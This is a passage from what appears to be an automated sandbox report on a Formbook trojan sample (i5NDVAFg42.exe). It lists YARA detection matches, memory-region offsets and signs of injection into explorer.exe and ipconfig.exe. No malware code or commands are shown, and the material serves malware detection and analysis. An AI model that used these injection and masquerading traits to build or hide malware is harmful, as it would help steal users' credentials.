              Source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: Process Memory Space: i5NDVAFg42.exe PID: 3060, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: Process Memory Space: ipconfig.exe PID: 1772, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: C:\Windows\explorer.exeCode function: 2_2_0E4D65CD2_2_0E4D65CD
              Source: C:\Windows\explorer.exeCode function: 2_2_105EB0362_2_105EB036
              Source: C:\Windows\explorer.exeCode function: 2_2_105E20822_2_105E2082
              Source: C:\Windows\explorer.exeCode function: 2_2_105E99122_2_105E9912
              Source: C:\Windows\explorer.exeCode function: 2_2_105E3D022_2_105E3D02
              Source: C:\Windows\explorer.exeCode function: 2_2_105EF5CD2_2_105EF5CD
              Source: C:\Windows\explorer.exeCode function: 2_2_105EC2322_2_105EC232
              Source: C:\Windows\explorer.exeCode function: 2_2_105E6B322_2_105E6B32
              Source: C:\Windows\explorer.exeCode function: 2_2_105E6B302_2_105E6B30
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A303E64_2_03A303E6
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0397E3F04_2_0397E3F0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2A3524_2_03A2A352
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039F02C04_2_039F02C0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A102744_2_03A10274
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A241A24_2_03A241A2
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A301AA4_2_03A301AA
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A281CC4_2_03A281CC
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039601004_2_03960100
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A0A1184_2_03A0A118
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039F81584_2_039F8158
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A020004_2_03A02000
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0396C7C04_2_0396C7C0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039947504_2_03994750
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039707704_2_03970770
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0398C6E04_2_0398C6E0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A305914_2_03A30591
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039705354_2_03970535
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A1E4F64_2_03A1E4F6
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A144204_2_03A14420
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A224464_2_03A22446
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A26BD74_2_03A26BD7
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2AB404_2_03A2AB40
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0396EA804_2_0396EA80
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A3A9A64_2_03A3A9A6
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039729A04_2_039729A0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039869624_2_03986962
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039568B84_2_039568B8
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0399E8F04_2_0399E8F0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039728404_2_03972840
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0397A8404_2_0397A840
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039EEFA04_2_039EEFA0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03962FC84_2_03962FC8
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0397CFE04_2_0397CFE0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A12F304_2_03A12F30
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03990F304_2_03990F30
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039B2F284_2_039B2F28
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039E4F404_2_039E4F40
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03982E904_2_03982E90
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2CE934_2_03A2CE93
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2EEDB4_2_03A2EEDB
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2EE264_2_03A2EE26
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03970E594_2_03970E59
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03988DBF4_2_03988DBF
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0396ADE04_2_0396ADE0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0397AD004_2_0397AD00
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A0CD1F4_2_03A0CD1F
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A10CB54_2_03A10CB5
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03960CF24_2_03960CF2
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03970C004_2_03970C00
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039B739A4_2_039B739A
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2132D4_2_03A2132D
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0395D34C4_2_0395D34C
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039752A04_2_039752A0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A112ED4_2_03A112ED
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0398B2C04_2_0398B2C0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0397B1B04_2_0397B1B0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A3B16B4_2_03A3B16B
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0395F1724_2_0395F172
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039A516C4_2_039A516C
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2F0E04_2_03A2F0E0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A270E94_2_03A270E9
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039770C04_2_039770C0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A1F0CC4_2_03A1F0CC
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2F7B04_2_03A2F7B0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A216CC4_2_03A216CC
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039B56304_2_039B5630
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A0D5B04_2_03A0D5B0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A275714_2_03A27571
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2F43F4_2_03A2F43F
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039614604_2_03961460
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0398FB804_2_0398FB80
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039ADBF94_2_039ADBF9
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039E5BF04_2_039E5BF0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2FB764_2_03A2FB76
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A11AA34_2_03A11AA3
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A0DAAC4_2_03A0DAAC
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039B5AA04_2_039B5AA0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A1DAC64_2_03A1DAC6
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A27A464_2_03A27A46
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2FA494_2_03A2FA49
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039E3A6C4_2_039E3A6C
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A059104_2_03A05910
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039799504_2_03979950
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0398B9504_2_0398B950
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039738E04_2_039738E0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039DD8004_2_039DD800
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03971F924_2_03971F92
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2FFB14_2_03A2FFB1
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2FF094_2_03A2FF09
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03979EB04_2_03979EB0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0398FDC04_2_0398FDC0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A27D734_2_03A27D73
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03973D404_2_03973D40
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A21D5A4_2_03A21D5A
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03A2FCF24_2_03A2FCF2
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039E9C324_2_039E9C32
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310E2664_2_0310E266
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310E1E54_2_0310E1E5
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310E5B44_2_0310E5B4
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030F2FB04_2_030F2FB0
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030F2D904_2_030F2D90
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310D5A34_2_0310D5A3
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310DB924_2_0310DB92
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310DAE64_2_0310DAE6
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030F9E604_2_030F9E60
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310DEB94_2_0310DEB9
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310DD874_2_0310DD87
              Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: String function: 039DEA12 appears 86 times
              Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: String function: 0395B970 appears 280 times
              Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: String function: 039B7E54 appears 103 times
              Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: String function: 039A5130 appears 58 times
              Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: String function: 039EF290 appears 105 times
              Source: C:\Users\user\Desktop\i5NDVAFg42.exe, Code function: String function: 0177B970 appears 278 times
              Source: C:\Users\user\Desktop\i5NDVAFg42.exe, Code function: String function: 017D7E54 appears 102 times
              Source: C:\Users\user\Desktop\i5NDVAFg42.exe, Code function: String function: 0180F290 appears 105 times
              Source: C:\Users\user\Desktop\i5NDVAFg42.exe, Code function: String function: 017FEA12 appears 86 times
              Source: C:\Users\user\Desktop\i5NDVAFg42.exe, Code function: String function: 017C5130 appears 58 times
              Source: i5NDVAFg42.exe, Static PE information: No import functions for PE file found
              Source: i5NDVAFg42.exe, 00000000.00000002.2046841117.0000000001AD7000.00000040.10000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameipconfig.exej% vs i5NDVAFg42.exe
              Source: i5NDVAFg42.exe, 00000000.00000003.1989066813.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs i5NDVAFg42.exe
              Source: i5NDVAFg42.exe, 00000000.00000002.2046523999.000000000187D000.00000040.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs i5NDVAFg42.exe
              Source: i5NDVAFg42.exe, 00000000.00000003.2044767474.0000000001245000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameipconfig.exej% vs i5NDVAFg42.exe
              Source: i5NDVAFg42.exe, 00000000.00000003.1987282372.0000000001516000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs i5NDVAFg42.exe
              Source: i5NDVAFg42.exe, 00000000.00000003.2044525388.000000000123F000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameipconfig.exej% vs i5NDVAFg42.exe
              Source: C:\Users\user\Desktop\i5NDVAFg42.exe, Section loaded: apphelp.dll
              Source: C:\Windows\explorer.exe, Section loaded: workfoldersshell.dll
              Source: C:\Windows\explorer.exe, Section loaded: windows.cloudstore.schema.shell.dll
              Source: C:\Windows\SysWOW64\ipconfig.exe, Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\ipconfig.exe, Section loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\ipconfig.exe, Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\ipconfig.exe, Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\ipconfig.exe, Section loaded: wininet.dll
              Source: i5NDVAFg42.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: i5NDVAFg42.exe, type: SAMPLE, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: i5NDVAFg42.exe, type: SAMPLE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: i5NDVAFg42.exe, type: SAMPLE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0.2.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0.2.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0.0.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0.0.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0.0.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000002.4456590108.000000000E4EB000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
              Source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
